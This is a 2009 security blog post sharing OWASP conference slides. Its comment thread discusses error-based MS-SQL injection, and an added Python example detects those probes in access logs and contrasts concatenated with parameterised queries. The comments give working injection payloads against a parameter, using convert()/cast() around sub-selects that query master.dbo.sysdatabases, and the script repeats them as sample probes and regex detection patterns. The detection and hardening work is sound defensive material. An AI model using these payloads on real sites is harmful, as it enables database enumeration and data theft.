Slides From OWASP Au 2009

March 19, 2009

Here are my slides from OWASP AU 2009.

Send comments/feedback to sid–at–notsosecure.com

6 Comments

  • Benjamin says:

    Hey Sumsid!

    Thanks for those slides 🙂

  • Marezzi says:

    nice slides 🙂 I have 1 question: how can I count how many databases there are via SQL injection in MS-SQL? I want to apply this query: Select count(CATALOG_NAME) from INFORMATION_SCHEMA.SCHEMATA, or Select count(name) from master.dbo.sysdatabases
    Thanks

  • sid says:

    i think you are after this:

    Select count(distinct name) from master.dbo.sysdatabases

    or you can do select db_name(n)

    and enumerate n till you get null.

    Hope it helps …:)

  • Marezzi says:

    Thanks for the info, but it's not working. I know about db_name(n), but I need this: asp?pid=12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))--
    I don't see an error. I also tried asp?pid=12 or 1=convert(int,(Select count(distinct catalog_name) from information_schema.schemata))-- with no success.
    Don't know what to do.

  • sid says:

    That's because the query returns an integer, and type conversion from int to int is valid, hence no errors.

    I will look for some more type conversions to get this returned as error message.

    You can still use the blind injection boolean query to get this value, but I think I know what you are after.. 🙂

  • sid says:

    select cast('total database:'+cast(count(name) as nvarchar) as int) from master.dbo.sysdatabases

    Msg 245, Level 16, State 1, Line 1
    Conversion failed when converting the nvarchar value 'total database:6' to data type int.
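The thread above turns on one fact: when a parameter is spliced into the statement text, a type conversion wrapped around a sub-select reaches the database engine as SQL, and the conversion error carries the result back. The Python below is an added example, not part of the post or of the comment thread. It does two defender-side things with that fact: it scans web-server access-log lines for request parameters carrying the convert()/cast()-around-a-select shape and the catalogue objects named in the thread, and it contrasts a concatenated lookup with a parameterised one so the difference in handling is visible. The log lines, the news.asp endpoint, the pid parameter, the news table and the SQLite stand-in for the backend are all constructed for the example (SQLite has no convert(), so the concatenated form fails differently from MS-SQL, but the point, that the injected text was parsed as SQL, is the same).

```python
"""Defender-side view of the error-based probes discussed in the comment thread:
flag them in access logs, and show the parameterised query that closes the hole."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the page). The query strings
# reproduce the shape of the probes shown in the thread against a hypothetical news.asp.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Mar/2009:10:01:02 +1100] "GET /news.asp?pid=12 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [19/Mar/2009:10:01:09 +1100] "GET /news.asp?pid=12%20or%201%3Dconvert(int,'
    '(Select%20count(distinct%20name)%20from%20master.dbo.sysdatabases))-- HTTP/1.1" 200 5120',
    '10.0.0.9 - - [19/Mar/2009:10:01:15 +1100] "GET /news.asp?pid=12%20or%201%3Dcast((select%20cast'
    '(count(name)%20as%20nvarchar)%20from%20master.dbo.sysdatabases)%20as%20int)-- HTTP/1.1" 500 812',
    '10.0.0.7 - - [19/Mar/2009:10:02:00 +1100] "GET /news.asp?pid=13 HTTP/1.1" 200 4980',
]

# Common/combined log format: client, identd, user, [time], "METHOD target HTTP/x.y", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# A type conversion wrapped around a sub-select is the tell-tale of the error-based
# technique: convert(int,(select ...)) or cast((select ...) as int).
CONVERSION_PROBE_RE = re.compile(r"\b(?:convert|cast)\s*\(.*?\bselect\b", re.IGNORECASE | re.DOTALL)
# Catalogue objects the thread enumerates; any of them inside a URL parameter is suspicious.
CATALOG_RE = re.compile(
    r"\b(?:master\.dbo\.sysdatabases|information_schema\.schemata|db_name\s*\()", re.IGNORECASE)


def scan_access_log(lines):
    """Return one finding per suspicious request: (client_ip, param_name, reasons, status)."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qs percent-decodes each value once, so %20 / %3D become ' ' / '='
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                reasons = []
                if CONVERSION_PROBE_RE.search(value):
                    reasons.append("type conversion around sub-select")
                if CATALOG_RE.search(value):
                    reasons.append("database catalogue reference")
                if reasons:
                    findings.append((ip, name, tuple(reasons), status))
    return findings


def build_demo_db():
    """In-memory SQLite stand-in for the table behind the hypothetical news.asp (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (pid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(12, "OWASP AU slides"), (13, "Next meetup")])
    return conn


def lookup_concatenated(conn, pid):
    """The vulnerable shape: the request parameter becomes part of the statement text."""
    return conn.execute(f"SELECT title FROM news WHERE pid = {pid}").fetchall()


def lookup_parameterised(conn, pid):
    """Hardened shape: pid travels as a bound value and is never parsed as SQL."""
    return conn.execute("SELECT title FROM news WHERE pid = ?", (pid,)).fetchall()


def compare_handling(pid_value):
    """Run both lookups on the same input.

    Returns (parsed_as_sql, rows_from_parameterised_lookup). parsed_as_sql is True when the
    concatenated statement failed to prepare, i.e. the engine read the parameter as SQL.
    """
    conn = build_demo_db()
    try:
        lookup_concatenated(conn, pid_value)
        parsed_as_sql = False
    except sqlite3.OperationalError:
        parsed_as_sql = True  # the injected text reached the SQL parser
    rows = lookup_parameterised(conn, pid_value)  # no error: the text is just a non-matching value
    return parsed_as_sql, rows


if __name__ == "__main__":
    for ip, name, reasons, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} param={name} status={status} reasons={'; '.join(reasons)}")
    probe = "12 or 1=convert(int,(Select count(distinct name) from master.dbo.sysdatabases))--"
    print("benign pid:", compare_handling("12"))
    print("probe pid :", compare_handling(probe))
```

Running it flags the two requests from 10.0.0.9 (one of which also produced a 500, the error page the technique depends on) and shows that the same probe string makes the concatenated statement fail to prepare while the parameterised lookup simply returns no rows. The 500 is worth correlating on its own: a burst of server errors on one endpoint from one client, with conversion keywords in the query string, is the footprint of exactly the enumeration discussed above.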
